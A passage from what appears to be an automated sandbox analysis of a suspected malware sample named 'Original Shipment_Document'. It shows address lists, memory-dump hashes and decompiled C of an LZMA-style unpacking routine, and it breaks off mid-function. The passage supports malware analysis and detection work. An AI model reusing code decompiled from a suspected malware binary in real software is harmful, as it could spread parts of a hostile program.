                                                0x00000000
                                                0x00000000
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00407033
                                                0x00407036
                                                0x00407039
                                                0x0040703b
                                                0x0040703d
                                                0x0040703d
                                                0x0040703e
                                                0x00407041
                                                0x00407048
                                                0x0040704b
                                                0x00407059
                                                0x00000000
                                                0x00000000
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407366
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x004072ec
                                                0x004072e6
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738a
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073bc
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000
                                                0x00407499
                                                0x004072e6
                                                0x0040726d
                                                0x0040726a
                                                0x00000000
                                                0x00406ea1

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                                                • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406FBB() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
